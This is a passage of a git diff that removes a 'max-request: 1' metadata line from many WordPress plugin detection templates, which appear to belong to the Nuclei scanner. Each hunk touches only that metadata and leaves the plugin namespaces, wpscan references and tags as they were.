https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: 